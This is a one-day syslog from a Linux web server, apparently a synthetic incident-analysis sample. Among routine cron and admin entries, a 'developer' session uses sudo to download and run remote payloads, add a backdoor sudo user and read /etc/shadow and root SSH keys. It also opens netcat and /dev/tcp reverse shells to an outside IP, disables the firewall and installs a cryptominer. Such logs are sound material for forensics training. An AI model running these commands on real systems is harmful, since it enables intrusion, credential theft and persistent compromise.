Jan 15 02:15:23 webserver01 systemd[1]: Starting Daily apt download activities...
Jan 15 02:15:24 webserver01 systemd[1]: Started Daily apt download activities.
Jan 15 02:30:01 webserver01 CRON[1247]: (root) CMD (/usr/local/bin/backup_rotation.sh)
Jan 15 02:30:05 webserver01 systemd[1]: Started Session 45 of user backup.
Jan 15 02:30:06 webserver01 sshd[1251]: pam_unix(sshd:session): session opened for user backup by (uid=0)
Jan 15 02:30:12 webserver01 backup[1289]: Running automated database backup
Jan 15 02:32:45 webserver01 backup[1289]: Database backup completed successfully to /backups/db_20240115.sql.gz
Jan 15 02:32:47 webserver01 sshd[1251]: pam_unix(sshd:session): session closed for user backup
Jan 15 03:00:01 webserver01 CRON[1342]: (root) CMD (/usr/bin/systemctl reload nginx)
Jan 15 03:15:22 webserver01 kernel: [12456.789123] ata1: SATA link up 6.0 Gbps
Jan 15 04:00:01 webserver01 CRON[1456]: (root) CMD (/usr/local/bin/log_rotate_check.sh)
Jan 15 05:30:15 webserver01 systemd[1]: Starting Clean php sessions...
Jan 15 05:30:16 webserver01 systemd[1]: Started Clean php sessions.
Jan 15 06:00:01 webserver01 CRON[1623]: (root) CMD (/usr/local/bin/system_health_check.sh)
Jan 15 06:45:12 webserver01 systemd[1]: Started Session 46 of user admin.
Jan 15 06:45:13 webserver01 sshd[1678]: pam_unix(sshd:session): session opened for user admin by (uid=0)
Jan 15 06:46:22 webserver01 sudo[1712]: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/systemctl status nginx
Jan 15 06:46:23 webserver01 sudo[1712]: pam_unix(sudo:session): session opened for user root by admin(uid=0)
Jan 15 06:46:24 webserver01 sudo[1712]: pam_unix(sudo:session): session closed for user root
Jan 15 06:48:15 webserver01 sudo[1734]: admin : TTY=pts/0 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/tail -f /var/log/nginx/access.log
Jan 15 06:52:30 webserver01 sshd[1678]: pam_unix(sshd:session): session closed for user admin
Jan 15 07:00:01 webserver01 CRON[1789]: (root) CMD (/usr/local/bin/check_disk_space.sh)
Jan 15 07:15:45 webserver01 systemd[1]: Starting Update UTMP about System Runlevel Changes...
Jan 15 08:30:01 webserver01 CRON[1856]: (www-data) CMD (/usr/local/bin/clear_cache.sh)
Jan 15 08:45:33 webserver01 systemd[1]: Started Session 47 of user developer.
Jan 15 08:45:34 webserver01 sshd[1891]: pam_unix(sshd:session): session opened for user developer by (uid=0)
Jan 15 08:47:12 webserver01 developer[1923]: Running git pull in /var/www/application
Jan 15 08:47:18 webserver01 developer[1923]: Git pull completed successfully
Jan 15 08:49:05 webserver01 sudo[1945]: developer : TTY=pts/1 ; PWD=/var/www/application ; USER=root ; COMMAND=/usr/bin/systemctl restart php7.4-fpm
Jan 15 08:49:06 webserver01 systemd[1]: Stopping PHP 7.4 FastCGI Process Manager...
Jan 15 08:49:07 webserver01 systemd[1]: Starting PHP 7.4 FastCGI Process Manager...
Jan 15 08:49:08 webserver01 systemd[1]: Started PHP 7.4 FastCGI Process Manager.
Jan 15 08:51:22 webserver01 sshd[1891]: pam_unix(sshd:session): session closed for user developer
Jan 15 09:00:01 webserver01 CRON[2012]: (root) CMD (/usr/bin/systemctl reload postfix)
Jan 15 09:30:01 webserver01 CRON[2089]: (backup) CMD (/usr/local/bin/incremental_backup.sh)
Jan 15 10:00:12 webserver01 systemd[1]: Starting Daily man-db regeneration...
Jan 15 10:15:34 webserver01 kernel: [34567.123456] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready
Jan 15 10:30:01 webserver01 CRON[2145]: (root) CMD (/usr/local/bin/security_updates_check.sh)
Jan 15 11:00:01 webserver01 CRON[2234]: (root) CMD (/usr/local/bin/monitor_services.sh)
Jan 15 11:23:45 webserver01 systemd[1]: Started Session 48 of user admin.
Jan 15 11:23:46 webserver01 sshd[2267]: pam_unix(sshd:session): session opened for user admin by (uid=0)
Jan 15 11:25:12 webserver01 sudo[2301]: admin : TTY=pts/2 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt update
Jan 15 11:25:13 webserver01 sudo[2301]: pam_unix(sudo:session): session opened for user root by admin(uid=0)
Jan 15 11:25:45 webserver01 sudo[2301]: pam_unix(sudo:session): session closed for user root
Jan 15 11:26:23 webserver01 sudo[2334]: admin : TTY=pts/2 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/apt upgrade -y
Jan 15 11:28:56 webserver01 systemd[1]: Reloading OpenSSH server daemon.
Jan 15 11:32:15 webserver01 sshd[2267]: pam_unix(sshd:session): session closed for user admin
Jan 15 12:00:01 webserver01 CRON[2445]: (root) CMD (/usr/local/bin/cleanup_tmp.sh)
Jan 15 12:30:01 webserver01 CRON[2512]: (www-data) CMD (/usr/local/bin/optimize_images.sh)
Jan 15 13:00:01 webserver01 CRON[2589]: (root) CMD (/usr/local/bin/check_load_average.sh)
Jan 15 13:15:23 webserver01 systemd[1]: Starting Cleanup of Temporary Directories...
Jan 15 13:15:24 webserver01 systemd[1]: Started Cleanup of Temporary Directories.
Jan 15 13:30:01 webserver01 CRON[2645]: (backup) CMD (/usr/local/bin/verify_backups.sh)
Jan 15 14:00:01 webserver01 CRON[2723]: (root) CMD (/usr/local/bin/database_optimize.sh)
Jan 15 14:23:17 webserver01 systemd[1]: Started Session 49 of user developer.
Jan 15 14:23:18 webserver01 sshd[2789]: pam_unix(sshd:session): session opened for user developer by (uid=0)
Jan 15 14:25:43 webserver01 developer[2823]: Checking application status
Jan 15 14:28:56 webserver01 sudo[2845]: developer : TTY=pts/3 ; PWD=/home/developer ; USER=root ; COMMAND=/usr/bin/wget http://185.243.114.89/payload.sh -O /tmp/update.sh
Jan 15 14:28:57 webserver01 sudo[2845]: pam_unix(sudo:session): session opened for user root by developer(uid=0)
Jan 15 14:29:02 webserver01 sudo[2845]: pam_unix(sudo:session): session closed for user root
Jan 15 14:29:15 webserver01 sudo[2867]: developer : TTY=pts/3 ; PWD=/home/developer ; USER=root ; COMMAND=/bin/bash /tmp/update.sh
Jan 15 14:29:16 webserver01 sudo[2867]: pam_unix(sudo:session): session opened for user root by developer(uid=0)
Jan 15 14:30:22 webserver01 sudo[2889]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/useradd -m -s /bin/bash sysadm1n
Jan 15 14:30:23 webserver01 useradd[2891]: new user: name=sysadm1n, UID=1005, GID=1005, home=/home/sysadm1n, shell=/bin/bash
Jan 15 14:31:07 webserver01 sudo[2912]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Jan 15 14:31:45 webserver01 sudo[2934]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/curl http://185.243.114.89/scanner.py -o /tmp/.scan.py
Jan 15 14:32:18 webserver01 sudo[2956]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/python3 /tmp/.scan.py
Jan 15 14:33:45 webserver01 sudo[2978]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/bin/nc -lvp 4444 -e /bin/bash
Jan 15 14:34:12 webserver01 sudo[3001]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/cat /root/.ssh/id_rsa
Jan 15 14:35:28 webserver01 sudo[3023]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/iptables -A INPUT -p tcp --dport 4444 -j ACCEPT
Jan 15 14:36:45 webserver01 sudo[3045]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/chmod 4755 /bin/bash
Jan 15 14:37:22 webserver01 sudo[3067]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget http://malicious-domain.xyz/rootkit.tar.gz -O /tmp/.rk.tar.gz
Jan 15 14:38:15 webserver01 sudo[3089]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/bin/tar -xzf /tmp/.rk.tar.gz -C /tmp
Jan 15 14:39:34 webserver01 sudo[3112]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/usermod -aG sudo sysadm1n
Jan 15 14:40:56 webserver01 sudo[3134]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/bin/cp /bin/bash /tmp/.backdoor
Jan 15 14:41:23 webserver01 sudo[3156]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/find /root -name "*.key" -o -name "*.pem"
Jan 15 14:42:47 webserver01 sudo[3178]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/crontab -e
Jan 15 14:43:15 webserver01 CRON[3201]: (root) CMD (/tmp/.backdoor -c "bash -i >& /dev/tcp/185.243.114.89/8080 0>&1")
Jan 15 14:44:33 webserver01 sudo[3223]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/iptables -F
Jan 15 14:45:12 webserver01 sudo[3245]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/systemctl stop ufw
Jan 15 14:46:28 webserver01 systemd[1]: Stopping Uncomplicated firewall...
Jan 15 14:46:29 webserver01 systemd[1]: Stopped Uncomplicated firewall.
Jan 15 14:47:45 webserver01 sudo[3267]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/wget http://185.243.114.89/cryptominer -O /usr/local/bin/sysupdate
Jan 15 14:48:52 webserver01 sudo[3289]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/chmod +x /usr/local/bin/sysupdate
Jan 15 14:49:34 webserver01 sudo[3312]: developer : TTY=pts/3 ; PWD=/tmp ; USER=root ; COMMAND=/usr/local/bin/sysupdate &
Jan 15 14:50:15 webserver01 sudo[2867]: pam_unix(sudo:session): session closed for user root
Jan 15 14:51:23 webserver01 sshd[2789]: pam_unix(sshd:session): session closed for user developer
Jan 15 15:00:01 webserver01 CRON[3378]: (root) CMD (/usr/local/bin/hourly_stats.sh)
Jan 15 15:30:01 webserver01 CRON[3445]: (www-data) CMD (/usr/local/bin/session_cleanup.sh)
Jan 15 16:00:01 webserver01 CRON[3512]: (root) CMD (/usr/local/bin/check_services.sh)
Jan 15 16:15:34 webserver01 systemd[1]: Starting Message of the Day...
Jan 15 16:15:35 webserver01 systemd[1]: Started Message of the Day.
Jan 15 16:30:01 webserver01 CRON[3589]: (backup) CMD (/usr/local/bin/sync_offsite.sh)
Jan 15 16:30:05 webserver01 systemd[1]: Started Session 50 of user backup.
Jan 15 16:30:06 webserver01 sshd[3595]: pam_unix(sshd:session): session opened for user backup by (uid=0)
Jan 15 16:32:45 webserver01 backup[3627]: Syncing backups to offsite location
Jan 15 16:35:23 webserver01 backup[3627]: Offsite sync completed successfully
Jan 15 16:35:25 webserver01 sshd[3595]: pam_unix(sshd:session): session closed for user backup
Jan 15 17:00:01 webserver01 CRON[3689]: (root) CMD (/usr/local/bin/network_monitor.sh)
Jan 15 17:23:12 webserver01 systemd[1]: Started Session 51 of user admin.
Jan 15 17:23:13 webserver01 sshd[3734]: pam_unix(sshd:session): session opened for user admin by (uid=0)
Jan 15 17:24:45 webserver01 sudo[3768]: admin : TTY=pts/4 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/systemctl status nginx
Jan 15 17:24:46 webserver01 sudo[3768]: pam_unix(sudo:session): session opened for user root by admin(uid=0)
Jan 15 17:24:47 webserver01 sudo[3768]: pam_unix(sudo:session): session closed for user root
Jan 15 17:26:33 webserver01 sudo[3790]: admin : TTY=pts/4 ; PWD=/home/admin ; USER=root ; COMMAND=/usr/bin/journalctl -u nginx -n 100
Jan 15 17:28:15 webserver01 sshd[3734]: pam_unix(sshd:session): session closed for user admin
Jan 15 17:30:01 webserver01 CRON[3845]: (root) CMD (/usr/local/bin/log_analysis.sh)
Jan 15 18:00:01 webserver01 CRON[3912]: (root) CMD (/usr/local/bin/performance_check.sh)
Jan 15 18:30:01 webserver01 CRON[3989]: (www-data) CMD (/usr/local/bin/compress_logs.sh)
Jan 15 19:00:01 webserver01 CRON[4056]: (root) CMD (/usr/local/bin/backup_configs.sh)
Jan 15 19:15:22 webserver01 kernel: [67890.456789] TCP: request_sock_TCP: Possible SYN flooding on port 80
Jan 15 19:30:01 webserver01 CRON[4123]: (backup) CMD (/usr/local/bin/verify_integrity.sh)
Jan 15 20:00:01 webserver01 CRON[4201]: (root) CMD (/usr/local/bin/system_snapshot.sh)
Jan 15 20:15:45 webserver01 systemd[1]: Starting Update Package Database...
Jan 15 20:15:48 webserver01 systemd[1]: Started Update Package Database.
Jan 15 20:30:01 webserver01 CRON[4278]: (root) CMD (/usr/local/bin/email_reports.sh)
Jan 15 21:00:01 webserver01 CRON[4345]: (root) CMD (/usr/local/bin/archive_old_logs.sh)
Jan 15 21:30:01 webserver01 CRON[4423]: (www-data) CMD (/usr/local/bin/cache_warm.sh)
Jan 15 22:00:01 webserver01 CRON[4489]: (root) CMD (/usr/local/bin/nightly_maintenance.sh)
Jan 15 22:15:33 webserver01 systemd[1]: Starting Rotate log files...
Jan 15 22:15:35 webserver01 systemd[1]: Started Rotate log files.
Jan 15 22:30:01 webserver01 CRON[4567]: (backup) CMD (/usr/local/bin/final_backup.sh)
Jan 15 22:30:05 webserver01 systemd[1]: Started Session 52 of user backup.
Jan 15 22:30:06 webserver01 sshd[4573]: pam_unix(sshd:session): session opened for user backup by (uid=0)
Jan 15 22:33:28 webserver01 backup[4605]: Running final daily backup
Jan 15 22:36:45 webserver01 backup[4605]: Final backup completed successfully
Jan 15 22:36:47 webserver01 sshd[4573]: pam_unix(sshd:session): session closed for user backup
Jan 15 23:00:01 webserver01 CRON[4678]: (root) CMD (/usr/local/bin/end_of_day_report.sh)
Jan 15 23:15:22 webserver01 systemd[1]: Starting Daily apt activities...
Jan 15 23:15:24 webserver01 systemd[1]: Started Daily apt activities.
Jan 15 23:30:01 webserver01 CRON[4745]: (root) CMD (/usr/local/bin/prepare_tomorrow.sh)
Jan 15 23:45:00 webserver01 systemd[1]: Starting Cleanup of old kernels...
Jan 15 23:45:02 webserver01 systemd[1]: Started Cleanup of old kernels.